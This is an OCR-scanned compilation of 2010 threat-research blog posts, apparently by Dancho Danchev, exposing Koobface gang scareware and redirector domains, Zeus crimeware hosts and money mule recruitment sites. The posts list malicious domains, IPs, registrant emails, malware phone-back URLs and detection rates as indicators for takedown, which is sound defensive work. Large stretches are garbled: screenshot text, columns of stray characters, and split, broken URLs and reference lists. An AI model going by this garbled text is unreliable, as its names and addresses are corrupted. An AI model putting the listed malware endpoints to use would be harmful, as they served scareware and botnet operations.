yourblog2blog.com - Email: test@now.net.cn 

microstoreblog.com - Email: test@now.net.cn 

mexicomaxtravel.com - Email: info@montever.de 

fulllife2photo.com - Email: test@now.net.cn 

yourmaximumphoto.com - Email: test@now.net.cn 

lineagecheatandbug.com - Email: test@now.net.cn 

titansandgods.com - Email: test@now.net.cn 

microsoftbugtracks.com - Email: test@now.net.cn 
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checkwebtriple.com 
fulllife2photo.com 
microsoftbugtracks.com 
microstoreblog.com 
parkeroffers.com 
terraanews.com A NET 195.5.161.0/24 ——“S-ge as43558 
titanicoverlight.com 
titansandgods.com 
wheretosellford.com 
yourblog2blog.com 


yourmaximumphoto.com 


secureyourinfos.com - Email: test@now.net.cn 
weddingiephotos.com - Email: test@now.net.cn 
parkeroffers.com - Email: test@now.net.cn 
nocderrors.com - Email: test@now.net.cn 
androidmobilereviews.com - Email: test@now.net.cn 
terraanews.com - Email: test@now.net.cn 
getbestshows.com - Email: test@now.net.cn 
videostvshows.com - Email: test@now.net.cn 
besttvshowininternet.com - Email: test@now.net.cn 
titanicoverlight.com - Email: test@now.net.cn 
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Computer scanning process 


Ld Shared Documerts i) My Documerts 


© 23 threats 


System Tasks 


4 View system information 


» Add ce remove programs 


ea Change 4 settings 


Other Places 


<@ Local Disk (C:) a Local Oisk (Dz) 


DvD 


bed My Network Places 
My Documents 


(3 Ssred Documerts 
oO 


“\ Windows Security Alert 


To help protect your computer, Windows Web Security has Ase HHeeReeeeeeeeees 
detected trojans and ready to remove them. fully, 31 Mab was found! 


Filename 


[¥] Admess.Trojan 


[7] zserv.Transponder.Trojan Dste 

[7] Wstart.TrojanDownloader 11.18.2008 

aa = 11.18.2008 
[_Remove ait} panes ‘tical 11.18,2008 


Files infected 


Rate 
Waking removal 
Waring removal 


Waring removal 


Spyware ts software, which can gather information from user's computer through 
Internet connection and send theen to ts crestor. Gathered information can be 
passwords, e-tnad addresses and all that data, which is important for you. 


You need to remove this threst a5 soon as possible! 


‘or your system. Trojan-Downloader 2tesing passwords, credit cards and other 
er. 


The scareware domains portfolio is currently parked on 195.5.161.117, 
EVENTISMOBILE-AS IM "Eventis-Mobile" SRL Chisinau, Republic of Moldova: 


be-protected-10.info - Email: harkitrip@ymail.com 
be-protecteda.info - Email: harkitrip@ymail.com 
be-protectedc.info - Email: harkitrip@ymail.com 
be-protectedi.info - Email: harkitrip@ymail.com 
be-protected-i8.info - Email: harkitrip@ymail.com 
be-protectedk.info - Email: harkitrip@ymail.com 
be-protected-l0.info - Email: harkitrip@ymail.com 
be-protected-I1.info - Email: harkitrip@ymail.com 
be-protected-t1.info - Email: harkitrip@ymail.com 
be-protectedy.info - Email: harkitrip@ymail.com 
be-secured-al.info - Email: harkitrip@ymail.com 
be-secured-b2.info - Email: harkitrip@ymail.com 
be-secured-c6.info - Email: harkitrip@ymail.com 
be-secured-d9.info - Email: harkitrip@ymail.com 
be-secured-z1.info - Email: harkitrip@ymail.com 
capital-security1.info - Email: goninanbiz2@ymail.com 
capital-security2.info - Email: goninanbiz2@ymail.com 
capital-security6.info - Email: goninanbiz2@ymail.com 
capital-securitya.info - Email: goninanbiz2@ymail.com 
capital-securityc.info - Email: goninanbiz2@ymail.com 
capital-securitye.info - Email: goninanbiz2@ymail.com 
capital-securityt.info - Email: goninanbiz2@ymail.com 


general-protectionO.info - Email: goninanbiz2@ymail.com 
general-protection1.info - Email: goninanbiz2@ymail.com 
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AS43558, 


general-protection4.info - Email: goninanbiz2@ymail.com 
general-protection9.info - Email: goninanbiz2@ymail.com 
how-to-secure-pcl.info - kramershoppers@yahoo.com 
help-you-now0. info - Email: intrigo2@yahoo.com 
help-you-now1.info - Email: intrigo2@yahoo.com 
help-you-now4. info - Email: intrigo2@yahoo.com 
help-you-now6. info - Email: intrigo2@yahoo.com 
help-you-now9. info - Email: intrigo2@yahoo.com 


¢ Consider going through "[1]The ultimate guide to scareware protection" and a [2]gallery 
of popular scareware/fake security software brands 


pchelpserver.info - Email: vernotowersc2@googlemail.com 
pchelpservera.info - Email: vernotowersc2@googlemail.com 
pchelpserverz.info - Email: vernotowersc2@googlemail.com 
powersecurity09.info - Email: miscelli3@googlemail.com 
powersecurityc.info - Email: miscelli3@googlemail.com 
powersecurityt.info - Email: miscelli3@googlemail.com 
powersecurityy.info - Email: miscelli3@googlemail.com 
powerssoftware0.info - Email: miscelli3@googlemail.com 
powerssoftwarel1.info - Email: miscelli3@googlemail.com 
powerssoftware3.info - Email: miscelli3@googlemail.com 
powerssoftware6.info - Email: miscelli3@googlemail.com 
security-softwarec.info - kramershoppers@yahoo.com 
software-helpa.info - Email: hartinaé@yahoo.com 
software-helpd.info - Email: hartinog@yahoo.com 
software-helpe.info - Email: hartinaé@yahoo.com 
software-helpy.info - Email: hartin6é@yahoo.com 
software-helpz.info - Email: hartiné@yahoo.com 
special-softwarel.info - Email: hartin6é@yahoo.com 
special-software3.info - Email: hartin6é@yahoo.com 
special-software7.info - Email: hartin6é@yahoo.com 
special-software8.info - Email: hartin6é@yahoo.com 
special-software9.info - Email: hartin6é@yahoo.com 
specialwebhelp0.info - Email: hartiné@yahoo.com 
specialwebhelp1.info - Email: hartiné@yahoo.com 
specialwebhelp3.info - Email: hartiné@yahoo.com 
specialwebhelp5.info - Email: hartiné@yahoo.com 
specialwebhelp7.info - Email: hartiné@yahoo.com 
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Detection rates for scareware samples rotated over the past 48 hours: 

- Setup _312s2.exe - [3] Trojan.Win32.FakeAV!IK - Result: 4/41 (9.76 %) 

- Setup _312s2.exe - [4]Trojan.Generic.KD.3549 - Result: 4/41 (9.76 %) 

- Setup _312s2.exe - [5]Trojan.Generic.KD.3605 - Result: 10/42 (23.81 %) 
- Setup _312s2.exe - [6]Packed.Win32.Krap.as - Result: 6/41 (14.64 %) 

- Setup _312s2.exe - [7]Trojan.Crypt.XPACK.Gen2 - Result: 6/42 (14.29 %) 
- Setup _312s2.exe - [8]Sus/UnkPack-C - 10/42 (23.81 %) 


The samples phone back to projectwupdates.com/ download/winlogo.bmp - 94.228.208.57 
and cariport.com/ ?b=312s2 - 89.248.168.21 (psdefendersoft.com and antispywarelist.com 
also parked there) - Email: zooik52@hotmail.com. 


¢ Consider going through the "[9]10 things you didn’t know about the Koobface gang" 
article 


Recent detection rates for Koobface components: 

- [10]fb.101.exe - Result: 39/42 (92.86 %) 

- [11]go.exe - Result: 7/42 (16.67 %) 

- [12]pp.14.exe - Result: 36/42 (85.72 %) 

- [13]v2bloggerjs.exe - Result: 39/42 (92.86 %) 

- [14]v2captcha21.exe - Result: 24/41 (58.54 %) 

- [15]v2newblogger.exe - Result: 23/41 (56.10 %) 

- [16]v2googlecheck.exe - Result: 36/41 (87.80 %) 
- [17]v2webserver.exe - Result: 26/42 (61.91 %) 


In respect the Koobface gang, as well as cybecrime in general, historical OSINT always 
offers an invaluable piece of the malicious puzzle of their campaigns, hosting providers, and 
the campaign structure making it easier to establish multiple connections between the rest of 
their non Koobface-botnet related campaigns. 


Here’s a peek at the redirectors and scareware domains served during February. For 
more extensive assessment of their activities for February, go through the "[18]A Diverse 
Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface Gang" 
post. 
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aol-wheretogo.com 
chevroletvmodeltoys.com 
delhiwebcamera.com 
delinotebookwire.com 
discounts-org.com 
discounts22.com 


helpworidlife.com 


‘ 96.44.128,0/18 ————AS--ge 4S$22298 


jacksonpollocksite.com A 96.44.128.245 mm 


, hosted.by.qudranet.com 


lexusbestparts.com 
microantivirus-scannerd.com 
microantivirusscannerl.com 
microantivirusscanner2.com 
removeallads.com 
wild-animals-photos.com 


wildworldsphotos.com 


Redirectors parked 91.212.132.242, AS49091, Interforum-AS Interforum LTD for February, 
2010: 

amazing-4-fotos.com - Email: test@now.net.cn 
bbcadditionalguide.com - Email: test@now.net.cn 
brightonsales.com - Email: test@now.net.cn 
dailyOOphotos.com - Email: test@now.net.cn 
daily6deals.com - Email: test@now.net.cn 
daily88news.com - Email: test@now.net.cn 
dellvideohacks.com - Email: test@now.net.cn 
discoverallnow.com - Email: test@now.net.cn 
discoverprivateinfo.com - Email: test@now.net.cn 
discoverprivatelife.com - Email: test@now.net.cn 
discoverprivatemail.com - Email: test@now.net.cn 
discoverprivatewebcams.com - Email: test@now.net.cn 
discoversecretdfacebook.com - Email: test@now.net.cn 
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facebookfriendwatch.com - Email: test@now.net.cn 
facebookreadmail.com - Email: test@now.net.cn 
free-amazon-coupon.com - Email: test@now.net.cn 
free-ebay-stuff.com - Email: test@now.net.cn 
free-secret-info.com - Email: test@now.net.cn 
getalestickets.com - Email: test@now.net.cn 
hightowerfisheye.com - Email: test@now.net.cn 
lenovovideohacks.com - Email: test@now.net.cn 
mymailbusiness.com - Email: test@now.net.cn 
private-0-photos.com - Email: test@now.net.cn 
seehiddenfacebook.com - Email: test@now.net.cn 
skyscrapeviews.com - Email: test@now.net.cn 
yahoobusinesstrip.com - Email: test@now.net.cn 
you22tube.com - Email: test@now.net.cn 


Scareware domains parked on 195.5.161.119, AS31252, STARNET-AS StarNet Moldova, 
for February, 2010: 

best-protection0O.info - Email: ware2mall@yahoo.com 
best-protection8.info - Email: ware2mall@yahoo.com 
bestprotectiona.info - Email: ware2mall@yahoo.com 
best-protectiona.info - Email: ware2mall@yahoo.com 
bestprotectione.info - Email: ware2mall@yahoo.com 
best-protectione.info - Email: ware2mall@yahoo.com 
best-protectionf.info - Email: ware2mall@yahoo.com 
megal-antivirus3.com - Email: test@now.net.cn 
megal-antivirus5.com - Email: test@now.net.cn 
megal-antivirus7.com - Email: test@now.net.cn 
megal-antivirus9.com - Email: test@now.net.cn 
megal-scanner5.com - Email: test@now.net.cn 
megal-scanner7.com - Email: test@now.net.cn 
smartsecurity0.info - Email: neeceheight@yahoo.com 
smartsecurity1.info - Email: neeceheight@yahoo.com 
smart-security1.info - Email: neeceheight@yahoo.com 
smartsecurity2.info - Email: neeceheight@yahoo.com 
smartsecurity7.info - Email: neeceheight@yahoo.com 
smartsecuritya.info - Email: neeceheight@yahoo.com 
smartsecurityd.info - Email: neeceheight@yahoo.com 
smart-securityo.info - Email: neeceheight@yahoo.com 
super2-antivirus.com - Email: neeceheight@yahoo.com 
super2-antivirus2.com - Email: neeceheight@yahoo.com 
ver2-scanner.com - Email: test@now.net.cn 
ver2-scanner2.com - Email: test@now.net.cn 
ver2-scanner4.com - Email: test@now.net.cn 


Persistence must be met with persistence. The domain portfolios are in a process of 
getting suspended, an update will posted as soon as this happens. 


Related Koobface gang/botnet research: 
[19]10 things you didn’t know about the Koobface gang 
[20]A Diverse Portfolio of Scareware/Blackhat SEO Redirectors Courtesy of the Koobface Gang 
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[21]How the Koobface Gang Monetizes Mac OS X Traffic 

[22]The Koobface Gang Wishes the Industry "Happy Holidays" 
[23]Koobface-Friendly Riccom LTD - AS29550 - (Finally) Taken Offline 
[24]Koobface Botnet Starts Serving Client-Side Exploits 

[25]Massive Scareware Serving Blackhat SEO, the Koobface Gang Style 
[26]Koobface Botnet’s Scareware Business Model - Part Two 
[27]Koobface Botnet’s Scareware Business Model - Part One 
[28]Koobface Botnet Redirects Facebook’s IP Space to my Blog 
[29]New Koobface campaign spoofs Adobe’s Flash updater 
[30]Social engineering tactics of the Koobface botnet 

[31]Koobface Botnet Dissected in a TrendMicro Report 
[32]Movement on the Koobface Front - Part Two 

[33]Movement on the Koobface Front 

[34]Koobface - Come Out, Come Out, Wherever You Are 
[35]Dissecting Koobface Worm’s Twitter Campaign 


This post has been reproduced from [36]Dancho Danchev’s blog. Follow him [37]on Twitter. 


ttp://www.virustotal.com/analisis/4e62af f9b6612090a088abd1f31817a4582ed9e2ad81cd456f£2e536d71fd0ad2- 12684 


WN F 
ct 
ct 
uel 
N 
N 
ion 
# 
fe) 
09 
un 
8. 
o 
ct 
a 
° 
B 
~N 
n 
o 
Q 
c 
A 
H 
ct 
a 
N 
y 
T 


ct 
ct 
ue) 
~ 
~ 
a 
fe) 
Bb 
Gu 
(0) 
=] 
ct 
N 
Qa 
=! 
(0) 
ct 
a 
° 
B 
~ 
N 
Ww 
ws 
? 
an 
N 
(o>) 
oO 
Be 
N 
~ 
Ww 
nS 
N 
Oo 
oe) 
w 
ima 
ct 
5B 


ra 


126 


xe) 


a 


ttp://www.virustotal.com/analisis/0bd309172eacda58255cf35e6be6c2a9942056597e12e124d2df2cf27ca7dafd-12684 


H 
O 


oI 


ttp://www.virustotal.com/analisis/4681a237851bfcf0e785d3841a77b9c5f 186067dc0218edb96457552046d7a91- 12684 


Co) 
i) 
iS) 


(o>) 
| 


ttp://www.virustotal .com/analisis/66a853d9ba6add77254eeba4cad01c30d0e9f09778adbb978fdad84d27566f 29-1268 


2 
RP 


804 
ttp://www.virustotal.com/analisis/f2bb5d8db53f005fb30f 6de99al 2a9a8aee9df 87 1b7357a0f 1f£d72f69abfe666- 1268 


| 


ttp://www.virustotal.com/analisis/2021aeecd166da3d87ec17a403d7df89491dcac9d5b59295325d08f£d52470dac- 1268 


; 


0. http: //www.virustotal.com/analisis/51b56df5ed2c9815b855c220001ff£8e118ac0dddf4d47b377 cf530156dca2b09- 12684 


Di H wold 

NJ . 

w 

ns ¢ |S 
42] 
Nin 
iy, 
o 
# 
[e) 
0a 
n 
N 
Q 
B 
oO 
ct 
a 
fo} 
B 
ag 
n 
oO 
a 
e 
A 
H 
ct 
< 
lio. 
~\ 
7 


py 


1. http://www.virustotal.com/analisis/ef700b4cda22ba9f c12076f db3cdb3aaa6ed57 34ac7 2a8c9bcd52209 16b096£ 3- 12684 


3 
oe) 


pay 


2. http: //www.virustotal.com/analisis/028af4fb82d77ba5227 99aba7e7d37df015a7ee99c6253a82bd4b5153b0d55a2- 12684 


ot) 
NJ 
us 
jo) 
N 


py 


3. http: //www.virustotal.com/analisis/0fe50ee612678361761b226cf8def51c9101ddd80fbbaf 567a782df7026bc464- 12684 


A 
O 


H 


4. bttp://www.virustotal.com/analisis/1123ef7613f£92e64c61d0f bef f2e93c1bbdf b7a005cf967628daf f c7 7bd06f5b- 12684 


H fo 
NJ 
ws 
“NI 
aN 


5. http: //www.virustotal.com/analisis/af43db7c6alcc160£b64659979a274fe205dd6cd2dac832ea4f08dc18d5fc4b5- 12684 


ot) 
NI 
us 
fo) 


H 


6. http: //www.virustotal.com/analisis/187ee3a40da9327 18df098b1caf4067b0d0ba81288ad5199453396baa7 35ae70- 12684 


ce) 
NJ 
us 
NX 
ips 


H 


7. bttp://www.virustotal.com/analisis/1108276c9773c90d617a96603981624160d8948e6992038eca7826f7700dc397- 12684 


oY) 
AJ 
oO 
© 
iS 


pay 


8. http: //ddanchev. blogspot .com/2010/02/diverse-portfolio-of-scarewareblackhat.htm 


3201 


19. 
20. 
21. 
22. 
23. 
24. 
25. 
26. 
27. 
28. 
29. 
30. 
31. 
32. 
33. 
34. 
35. 
36. 
37. 


http: 
http: 
http: 


http 


http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 
http: 


//blogs.zdnet .com/security/?p=5452 


//ddanchev. 
//ddanchev. 
://ddanchev. 
//ddanchev. 
//ddanchev. 
//ddanchev. 
//ddanchev. 
//ddanchev. 
//ddanchev. 


blogspot. 
blogspot. 
blogspot. 
blogspot. 
blogspot. 
blogspot. 
blogspot. 
blogspot. 
blogspot. 


com/2010/02/diverse-portfolio-of-scarewareblackhat . html 
com/2010/02/how-koobface- gang-monetizes-mac-os-x. html 
com/2009/12/koobface-gang-wishes-industry-happy. html 
com/2009/12/koobface-friendly-riccom-1td-as29550.html 
com/2009/11/koobface-botnet-starts-serving-client.html 
com/2009/11/massive-scareware-serving-blackhat-seo. html 
com/2009/11/koobface-botnets-scareware-business. html 
com/2009/09/koobface-botnets-scareware-business. html 


com/2009/10/koobface-botnet-redirects-facebooks-ip.html 


//blogs.zdnet .com/security/?p=4594 
//content.zdnet .com/2346-12691_22-352597 .htm1 


//ddanchev 
//ddanchev 
//ddanchev 
//ddanchev 
//ddanchev 
//ddanchev 


. blogspot. 
- blogspot. 
. blogspot. 
. blogspot. 
. blogspot. 
- blogspot. 


com/2009/10/koobface-botnet-dissected-in-trendmicro.html 
com/2009/08/movement-on-koobface-front-part-two.html 
com/2009/08/movement-on-koobface-front .html 
com/2009/07/koobface- come-out- come-out-wherever-you.html 
com/2009/07/dissecting-koobface-worms-twitter. html 


com/ 


//twitter.com/danchodanchev 


6.3.7 The Current State of the Crimeware Threat (2010-03-20 17:05) 


2) meee Came, Cres ape be neriac ecm Ramee HemeNey RIeNTY CE apy, 


With [1]Zeus crimeware infections reaching epidemic levels, [2]two-factor authentication 
under fire, and the actual [3]DIY (do-it-yourself) kit becoming more sophisticated, it’s time to 
reassess the situation by discussing the current and emerging crimeware trends. 


What’s the current state of the crimeware threat? Just how vibrant is the underground 
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marketplace when it comes to crimeware? What are ISPs doing, and should ISPs be doing to 
solve the problem? Does taking down a cybercrime-friendly ISP has any long term effects? 


| asked [4]Thorsten Holz, researcher at Vienna University of Technology, whose team not 
only participated in the recent [5]takedown of the Waledac botnet, but [6]released an inter- 
esting paper earlier this year, summarizing their findings based on 33GB of crimeware data 
obtained from active campaigns. 


¢ [7]The current state of the crimeware threat - Q &A 
Go through the Q &A. 


Related posts on crimeware kits, trends and developments: 
[8]Crimeware in the Middle - Zeus 

[9]Crimeware in the Middle - Limbo 

[10]Crimeware in the Middle - Adrenalin 

[11]76Service - Cybercrime as a Service Going Mainstream 
[12]Zeus Crimeware as a Service Going Mainstream 
[13]Modified Zeus Crimeware Kit Comes With Built-in MP3 Player 
[14]Zeus Crimeware Kit Gets a Carding Layout 

[15]The Zeus Crimeware Kit Vulnerable to Remotely Exploitable Flaw 
[16]Help! Someone Hijacked my 100k+ Zeus Botnet! 

[17]Inside a Zeus Crimeware Developer’s To-Do List 


Zeus crimeware serving campaigns for Q1, 2010, related to TROYAK-AS: 
[18]TROYAK-AS: the cybercrime-friendly ISP that just won’t go away 
[19]AS50215 Troyak-as Taken Offline, Zeus C &Cs Drop from 249 to 181 
[20]Outlook Web Access Themed Spam Campaign Serves Zeus Crimeware 
[21]Pushdo Serving Crimeware, Client-Side Exploits and Russian Bride Scams 
[22]PhotoArchive Crimeware/Client-Side Exploits Serving Campaign in the Wild 
[23]Tax Report Themed Zeus/Client-Side Exploits Serving Campaign in the Wild 
[24]Keeping Money Mule Recruiters on a Short Leash - Part Two[25] 


This post has been reproduced from [26]Dancho Danchev’s blog. Follow him [27]on Twitter. 
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1. 
2. 

3. 
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6. 
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8. 

9. 

10. 


11. http://ddanchev. blogspot .com/2008/08/76service-cybercrime-as-service-going htm 


12. http://ddanchev. blogspot .com/2008/12/zeus- crimeware-as-service-going. htm 


13. http://ddanchev. blogspot .com/2008/09/modif ied-zeus-crimeware-kit-comes-with. htm 


14. http://ddanchev. blogspot .com/2008/11/zeus-crimeware-kit-gets-carding-layout.htm 


15. http://ddanchev. blogspot .com/2008/06/zeus-crimeware-kit-vulnerable-to.htm 
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://ddanchev .blogspot .com/2009/04/inside-zeus- crimeware-developers-to-do.html 
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//ddanchev. 
//ddanchev. 
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blogspot. 
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blogspot. 


com/2010/03/as50215-troyak-as-taken-offline-zeus-c.html 
com/2010/01/outlook-web-access-themed-spam- campaign .html 
com/2010/01/pushdo-serving-crimeware-client-side.html 
com/2010/02/photoarchive-crimewareclient-side.html 
com/2010/02/tax-report-themed-zeusclient-side. html 
com/2010/02/keeping-money-mule-recruiters-on-short. html 
com/2010/02/tax-report-themed-zeusclient-side.html 


com/ 


://twitter.com/danchodanchev 


Keeping Money Mule Recruiters on a Short Leash - Part Three (2010-03-20 23:14) 


TNM Group Inc 


Homme About the Company Projects Anatytcs tanks Contact Us 


Seeking Joomla Expert 


Magerte or CSS/XHTML/IS 
part time develocer 


Help Market Webste 


Web Oeveloper / Cengner 
Freelance 


Expenenced Graotec Desagner 


freelance flash designer for 
metste 


Orgone Freelance Web 
Cemgner - < $50/ hv 


Development, Design and/or 
Flash 


UPDATED: 7 minutes after notification, EUROACCESS responded that the IPs mentioned within 
the AS "have been blackholed for the time being until a confirmation of cleanup has been 
received from the customer." 
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augment-group.com 
augmentgroup.net 
augment-groupmain. tw 
amplitude-groupmain.net 
ygroup.net 
group,com 
groupli.com 
roupmain, tw 
roupmain,net 
roupmain, bw 


roupinc.net 


fecunda-groupmain.net 
fecunda-groupmain, tw 
foreaim-group com 


foreaimgroup.net 


tnmgrou 
Enmgroupint 


westendgroupsyc.net 


It’s a fact. However, in less than a minute the money mule recruitment gang moved the 
domains from the now blackholed 85.12.46.241; 85.12.46.242; 85.12.46.243; 85.12.46.244: 
85.12.46.245 to 85.12.46.95 and 85.12.46.96. 


These, including the crimeware and the scareware IPs, are now also blackholed. Let’s 
see what the gang will do next. 


The cybercriminals you know, are better than the cybercriminals you don’t know. They 
can be typosquatting, or changing their hosting providers, but they can’t escape. 


The money mule recruiters profiled in "[1]Keeping Money Mule Recruiters on a Short Leash" 
and in "[2]Keeping Money Mule Recruiters on a Short Leash - Part Two" are now switching 
hosting to AS34305, EUROACCESS Global Autonomous System - the [3]Koobface gang was 
also using their services during the Christmas season. 


The gang appears to have also purchased new templates using new, but naturally, bo- 
gus descriptions of the money mule recruitment companies. It gets even more interesting, 
when one of the domains ([4]greatuk.org) participating in a Zeus crimeware campaign within 
AS34305, has been registered to hilarykneber@yahoo.com ([5]The Kneber botnet - FAQ). 


An excerpt from [6]The Kneber botnet - FAQ on the Koobface gang connection: 
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* The name servers used in [7] December, 2009’s DocStoc scareware campaign, were regis- 
tered using the same email used to register the [8]client-side exploit serving domains part 
of the Koobface gang’s experiment conducted in November, 2009. Parked on the same IP 
hosting the domain which was serving the malware in the campaign, was also the a do- 
main registered to HilaryKneber@yahoo.com (search-results .cn) Even more interesting 
is the fact that the emails used to registered the rest of the domains parked at this IP, are 
also known to have been used in registering money mule recruitment domains ([9]Stan- 
dardizing the Money Mule Recruitment Process; [10]Keeping Money Mule Recruiters on 
a Short Leash) 


The bogus money mule recruitment companies are using identical templates, describing 
themselves as follows: 

"Welcome to the world of Outsourcing. Never has a phenomenon been so all encompassing 
and empowering like outsourcing. Transcending beyond an industry’s vertical segments, 
outsourcing has become the "by default" strategy for all profit conscious organizations that 
struggle to retain their winning streak and high profitability. Today’s scenario in the business 
world is more competitive than what it was in the past. 


There is a growing realization that wisdom lies in consolidating the core competency 
functions and outsourcing the supplement. We are an online services marketplace in USA and 
Australia. Our goal is to empower businesses with the absolute freedom to choose where to 
outsource their business needs to maximize their competitive advantage. We believe that 
"money saved due to outsourcing can be effectively and successfully utilized to focus more 
on strategic and core businesses functions". 


Let’s expose the domains portfolio, its supporting name servers, and emphasize on the 


scareware and crimeware activity currently taking place at AS34305, EUROACCESS Global 
Autonomous System. 
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Synapse Group Inc 


About the Company Authorization 


Latest projects 


Our service 


Active money mule recruitment domains: 

augment-group.com - 85.12.46.245 - Email: mylar@5mx.ru 
augmentgroup.net - 85.12.46.245 - Email: glean@fastermail.ru 
augment-groupmain.tw - 85.12.46.245 - Email: gutsy@qx8.ru 
amplitude-groupmain.net - 85.12.46.245 - Email: tabs@5mx.ru 
asperitygroup.net - 85.12.46.241 - Email: cde@freenetbox.ru 
asperity-group.com - 85.12.46.244 - Email: okay@qx8.ru 
alwyn-groupllic.com - Email: cde@freenetbox.ru 
altitude-groupli.com - 85.12.46.244 - Email: mylar@5mx.ru 
celeritygroupmain.tw - 85.12.46.242 - Email: gutsy@qx8.ru 
celerity-groupmain.net - 85.12.46.243 - cde@freenetbox.ru 
celerity-groupmain.tw - 85.12.46.241 - Email: weds@fastermail.ru 
impact-groupinc.net - 85.12.46.242 - Email: cde@freenetbox.ru 
impact-groupnet.com - 85.12.46.243 - Email: okay@qx8.ru 
excel-groupsvc.com - 85.12.46.241 - Email: carlo@qx8.ru 
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Augment Group Ine 


How site works? 


1. Post and track your vacancies, RFPs and projects 
2. Find affordable freelancers or full-time staff 


& 3. Get work done below budget and make profit 


About the Company Authorization 


Our service Latest projects 


fecunda-group.com - 85.12.46.241 - Email: okay@qx8.ru 
fecunda-groupmain.net - 85.12.46.243 - Email: mylar@5mx.ru 
fecunda-groupmain.tw - 85.12.46.245 - Email: ti@fastermail.ru 
foreaim-group.com - 85.12.46.245 - Email: cde@freenetbox.ru 
foreaimgroup.net - 85.12.46.241 - Email: glean@fastermail.ru 
golden-gateinc.com - 85.12.46.242 - Email: cde@freenetbox.ru 
golden-gateco.net - 85.12.46.242 - Email: carlo@qx8.ru 
luxor-groupco.tw - 85.12.46.244 - Email: logic@qx8.ru 
luxor-groupinc.tw - 85.12.46.244 - Email: gv@fastermail.ru 
synapse-groupinc.tw - 85.12.46.241 - Email: omega@ 


fastermail.ru 

synapse-groupfine.net - 85.12.46.245 - Email: okay@qx8.ru 
synapsegroupli.com - 85.12.46.243 - Email: tabs@5mx.ru 
spark-groupsvc.com - Email: trim@freenetbox.ru 
tnmgroupsvc.net - 85.12.46.245 - Email: tabs@5mx.ru 
tnmgroupinc.com - 85.12.46.241 - Email: tabs@5mx.ru 
westendgroupsvc.net - 85.12.46.241 - Email: mylar@5mx.ru 
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What We Do Services Overview About us 


Name servers: 

ns1.maninwhite.cc - 89.248.166.45 - Email: duly@fastermail.ru 
ns1.trythisok.cn - 89.248.166.45 - Email: chunk@qx8.ru 
ns1.translatasheep.net - 92.63.111.127 - Email: stair@freenetbox.ru 
ns1.alwaysexit.com - 92.63.111.146 - Email: soo@bigmailbox.ru 
nsl.chinegrowth.cc - 89.248.166.59 - Email: duly@fastermail.ru 
ns2.cnnandpizza.cc - 205.234.195.188 - Email: bears@fastermail.ru 
ns1.benjenkinss.cn - 89.248.166.59 - Email: chunk@qx8.ru 
nsl1.worldslava.cc - 64.85.174.145 - Email: fussy@bigmailbox.ru 
ns2.uleaveit.com - 204.12.217.253 - Email: plea@qx8.ru 
ns3.pesenlife.net - 74.118.194.86 - Email: erupt@qx8.ru 
nsl.basilkey.ws - 98.158.171.87 


Next to the money mule recruitment domains, there are several [11l]active Zeus crime- 
ware active campaigns, using the following domains/IPs. In fact one of them is using a domain 
registered to Hilary Kneber ([12]The Kneber botnet - FAQ): 

[13]greatuk.org - 193.104.22.100 - Email: hilarykneber@yahoo.com 

[14]greatan.cn - 193.104.22.100 - Email: AlehnoLopu @yahoo.com 

[15]193.104.22.71 

[16]193.104.22.90 
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What are we missing? Naturally, that’s the scareware monetization element. Let’s ex- 
pose one of the currently active scareware domain portfolios there. 


Domains responding to 193.104.22.50 - AS34305, EUROACCESS Global Autonomous Sys- 
tem: 

2009antispyware.net - Email: admin@web-antispyware.com 
againstspyware.com - Email: admin@antiviruscenter.net 
antispycenterprof.com - Email: admin@antispycenterprof.com 
anti-spyware-2010.net - Email: admin@antiviruscenter.net 
antispyware24x7.com - Email: admin@antispyware24x7.com 
antispywareglobal.com - Email: admin@antiviruscenter.net 
antispywareonline.net - Email: admin@antiviruscenter.net 
antispywaresnet.com - Email: admin@antispywaresnet.com 
antispywarets.com - Email: admin@antispywarets.com 
antispywareweb.net - Email: admin@antiviruscenter.net 
antispyworldwideint.com - Email: admin@antispyworldwideint.com 
antiviruscenter.net - Email: admin@antiviruscenter.net 
antivirusexpert.net - Email: admin@antiviruscenter.net 
antivirus-live.net - Email: admin@antiviruscenter.net 
antiviruslivepro.com - Email: admin@antiviruscenter.net 
antiviruslive-pro.com - Email: admin@antiviruscenter.net 
antivirus-service.net - Email: admin@antiviruscenter.net 
antivirustop.net - Email: admin@antiviruscenter.net 
bestantispysoft2010.com - Email: admin@bestantispysoft2010.com 


3210 


eliminater2009pro.com - Email: admin@eliminater2009pro.com 
itsafetyonline.com - Email: admin@itsafetyonline.com 
ivirusidentify.com - Email: admin@ivirusidentify.com 
myprivatesoft2009.com - Email: admin@myprivatesoft2009.com 
netantivirus.net - Email: admin@antiviruscenter.net 
onlineantispysoft.com - Email: admin@onlineantispysoft.com 
pcdoctorz2010.com - Email: admin@pcdoctorz2010.com 
pcprotect2010.com - Email: admin@pcprotect2010.com 
pcsafety2009pro.com - Email: admin@pcsafety2009pro.com 
protection2010.com - Email: admin@pcsafety2009pro.com 
protectorservice.com - Email: admin@antiviruscenter.net 
superantivirus.net - Email: admin@antiviruscenter.net 
systemprotector.net - Email: admin@antiviruscenter.net 
total-defender.com - Email: admin@total-defender.com 
virusdetect24.com - Email: admin@antiviruscenter.net 
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virusremoveonline.com - Email: admin@antiviruscenter.net 
worldantispywarel.com - Email: admin@worldantispywarel.com 
worldprotection.net - Email: admin@antiviruscenter.net 


EUROACCESS has been notified, the post will be updated once/if they take care of the 
"customers" violating their Terms of Service. 


Related coverage of money laundering in the context of cybercrime: 
[17]Money Mule Recruiters on Yahoo!’s Web Hosting 

[18]Dissecting an Ongoing Money Mule Recruitment Campaign 
[19]Keeping Money Mule Recruiters on a Short Leash - Part Two 
[20]Keeping Reshipping Mule Recruiters on a Short Leash 
[21]Keeping Money Mule Recruiters on a Short Leash 
[22]Standardizing the Money Mule Recruitment Process 

[23]Inside a Money Laundering Group’s Spamming Operations 
[24]Money Mule Recruiters use ASProx’s Fast Fluxing Services 
[25]Money Mules Syndicate Actively Recruiting Since 2002 


This post has been reproduced from [26]Dancho Danchev’s blog. Follow him [27]on Twitter. 
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. http: //ddanchev. blogspot .com/2009/11/koobface-botnet-starts-serving-client.htm 


mule-recruitment.html 


10. http: //ddanchev.blogspot .com/2009/11/keeping-money-mule-recruiters-on-short .htm 


11. https://zeustracker.abuse.ch/monitor . php?as=3430 
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15. https://zeustracker.abuse.ch/monitor . php?host=193.104.22.71 
16. https: //zeustracker.abuse.ch/monitor .php?host=193.104.22.90 
